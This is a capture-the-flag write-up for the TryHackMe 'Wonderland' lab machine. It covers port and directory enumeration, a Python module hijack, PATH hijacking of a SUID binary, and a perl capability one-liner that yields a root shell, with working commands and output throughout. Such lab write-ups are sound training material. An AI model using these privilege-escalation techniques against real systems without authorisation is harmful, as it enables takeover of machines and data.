Wonderland - wook413

#tryhackme #linux #medium #capabilities #PATH ![[Pasted image 20250705152241.png]] --- # Information Gathering - Nmap Started off with Nmap TCP scan against all ports. Found 2 open ports: 22 and 80. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n -open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-05 12:43 CDT Nmap scan report for 10.10.254.198 Host is up (0.13s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 23.18 seconds ``` Ran a more detailed scan against 2 open ports found ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sCV $IP -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-05 12:44 CDT Nmap scan report for 10.10.254.198 Host is up (0.14s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA) | 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA) |_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519) 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-title: Follow the white rabbit. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.32 seconds ``` No open UDP ports ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-05 12:45 CDT Nmap scan report for 10.10.254.198 Host is up (0.14s latency). Not shown: 994 open|filtered udp ports (no-response) PORT STATE SERVICE 1645/udp closed radius 16573/udp closed unknown 17205/udp closed unknown 17505/udp closed unknown 28840/udp closed unknown 49159/udp closed unknown Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds ``` --- # Footprinting ##### Port 80 ![[Pasted image 20250705124915.png]] `gobuster` revealed some directories. I first navigated to `/r` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.254.198 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /img (Status: 301) [Size: 0] [--> img/] /r (Status: 301) [Size: 0] [--> r/] /poem (Status: 301) [Size: 0] [--> poem/] /http%3A%2F%2Fwww (Status: 301) [Size: 0] [--> /http:/www] ``` `/r` didn't have anything useful but the page tells me to keep going so I ran `gobuster` again from this directory `/r` and it revealed `/a` ![[Pasted image 20250705130124.png]] `/r/a` ![[Pasted image 20250705130256.png]] `/r/a/b` ![[Pasted image 20250705130341.png]] `/r/a/b/b` ![[Pasted image 20250705130432.png]] `/r/a/b/b/i` ![[Pasted image 20250705130505.png]] # Exploit I finally got past `/r/a/b/b/i/t`. The 'Keep Going' sign is gone, and now it says to open the door and enter Wonderland. The creator of this machine really nailed the Alice in Wonderland theme. It's very cool :) ![[Pasted image 20250705130545.png]] In the Page Source, I found what appears to be a set of credentials. ![[Pasted image 20250705131119.png]] # Lateral Movement (alice > rabbit) ##### Port 22 Successfully logged into SSH server as `alice` ```bash alice@wonderland:~$ whoami alice ``` In `/home/alice`, there are two files: `root.txt` and `walrus_and_the_carpenter.py`. We cannot open `root.txt` but we can read the latter. ```bash alice@wonderland:~$ ls root.txt walrus_and_the_carpenter.py alice@wonderland:~$ ls -l total 8 -rw------- 1 root root 66 May 25 2020 root.txt -rw-r--r-- 1 root root 3577 May 25 2020 walrus_and_the_carpenter.py ``` I attempted to run the file and it actually ran. The file imports `random` module and when executed it returns 10 random lines of the poem. ```bash alice@wonderland:~$ cat walrus_and_the_carpenter.py import random poem = """The sun was shining on the sea, Shining with all his might: He did his very best to make The billows smooth and bright — And this was odd, because it was The middle of the night. The moon was shining sulkily, Because she thought the sun Had got no business to be there After the day was done — "It’s very rude of him," she said, "To come and spoil the fun!" <SNIP> for i in range(10): line = random.choice(poem.split("\n")) ``` `sudo -l` reveals that we can run the file as user `rabbit`. How can we perform lateral movement from `alice` to `rabbit`? ```bash alice@wonderland:~$ sudo -l Matching Defaults entries for alice on wonderland: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User alice may run the following commands on wonderland: (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py ``` Notice that `walrus_and_the_carpenter.py` file imports a Python module called `random`. When Python looks for modules to import, it starts from the current directory. We can create a payload and name it `random` and when executing the Python file, it will automatically runs our payload. ```bash alice@wonderland:~$ echo 'import os; os.system("/bin/bash")' > random.py alice@wonderland:~$ ls random.py root.txt walrus_and_the_carpenter.py ``` successfully moved from `alice` to user `rabbit`. ```bash alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py rabbit@wonderland:~$ whoami rabbit ``` # Lateral Movement (rabbit > hatter) In `/home/rabbit`, there was a file named `teaParty` and the file had SUID bit set. Since the owner of the file is `root`, this is without a doubt a good attack vector. ```bash rabbit@wonderland:/home/rabbit$ ls -l total 20 -rwsr-sr-x 1 root root 16816 May 25 2020 teaParty ``` I ran the file and noticed it returned `Segmentation fault (core dumped)` which might indicate it has to do with `Buffer Overflow` ```bash rabbit@wonderland:/home/rabbit$ ./teaParty Welcome to the tea party! The Mad Hatter will be here soon. Probably by Sat, 05 Jul 2025 20:15:06 +0000 Ask very nicely, and I will give you some tea while you wait for him asdf Segmentation fault (core dumped) ``` I transferred the file to my local environment to decompile the file. ```bash rabbit@wonderland:/home/rabbit$ python3 -m http.server 8888 Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ... 10.23.133.183 - - [05/Jul/2025 19:20:13] "GET /teaParty HTTP/1.1" 200 - ``` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ wget http://$IP:8888/teaParty --2025-07-05 14:20:13-- http://10.10.254.198:8888/teaParty Connecting to 10.10.254.198:8888... connected. HTTP request sent, awaiting response... 200 OK Length: 16816 (16K) [application/octet-stream] Saving to: ‘teaParty’ teaParty 100%[==========================>] 16.42K --.-KB/s in 0.1s 2025-07-05 14:20:13 (124 KB/s) - ‘teaParty’ saved [16816/16816] ``` In order to decompile the program, I will use `Ghidra`, a software reverse-engineering tool. You can install `Ghidra` in Kali by running `sudo apt install ghidra` After importing our file `teaParty`, write click on it, and select `Open With` > `CodeBrowser` ![[Pasted image 20250705143139.png]] When you are prompted to select if you want to analyze the program, select 'Yes'. Then you will see its code language written in Assembly Language, which is admittedly not intuitive to read for us. Luckily, Ghidra provides translation feature from Assembly to C. To do this, we need to open the `Decompiler` window. `Window > Decompiler`. Then, in the `Symbol Tree` menu in the left-hand side of the window, find `main` function. Upon selecting the main function, you will see the translated C source code in the Decompiler window. ![[Pasted image 20250705143635.png]] `teaParty` program sets the user identifier to `0x3eb` with `setuid`. A conversion from hexadecimal to decimal shows that is 1003. If we hop back to the Wonderland machine, we can discover that the id belongs to `hatter` with the `id 1003` command. Therefore, user `hatter` is the one that will be executing the rest of this process, not `root` or `rabbit`. Another things to note is that in order to display the time and date, `teaParty` program calls the external `date` program, but does not specify the absolute path `/bin/date`. Because of this, instead of immediately being able to execute `/bin/date`, the shell will be forced to search for it. To find it, it will check the `PATH` environment variable. We can take advantage of this fact, add our script's directory to the `PATH` environment variable and perform exploitation. ![[Pasted image 20250705143743.png]] In `/tmp`, I added `/bin/bash` command inside a file and named the file as `date` ```bash rabbit@wonderland:/tmp$ echo "/bin/bash" > date rabbit@wonderland:/tmp$ chmod +x date ``` Then added `/tmp` in the `PATH` environment variable. Now if we run `teaParty` program, when it looks for `date` program, it will first search `date` in `/tmp` directory because it's specified in the `PATH` environment variable. ```bash rabbit@wonderland:/tmp$ echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin rabbit@wonderland:/tmp$ export PATH=/tmp:$PATH rabbit@wonderland:/tmp$ echo $PATH /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin ``` Got the shell. ```bash rabbit@wonderland:/home/rabbit$ ./teaParty Welcome to the tea party! The Mad Hatter will be here soon. Probably by hatter@wonderland:/home/rabbit$ whoami hatter hatter@wonderland:/home/rabbit$ ``` # Privilege Escalation (hatter > root) In `/home/hatter`, I found `password.txt`. It appears to include the password of `hatter` in plain text. ```bash hatter@wonderland:/home/hatter$ cat password.txt WhyIsARavenLikeAWritingDesk? ``` I spent a lot of time trying to get a clue of PrivEsc. Then I thought to look for files that have `Capabilities` permissions set. I found `perl` program has `cap_setuid+ep` set to it. ```bash hatter@wonderland:/home/hatter$ getcap -r / 2>/dev/null /usr/bin/perl5.26.1 = cap_setuid+ep /usr/bin/mtr-packet = cap_net_raw+ep /usr/bin/perl = cap_setuid+ep ``` Referring to `gtfobins.github.io`, I came up with the exploit below and I was able to get the shell as `root`. ```bash hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";' root@wonderland:~# whoami root ```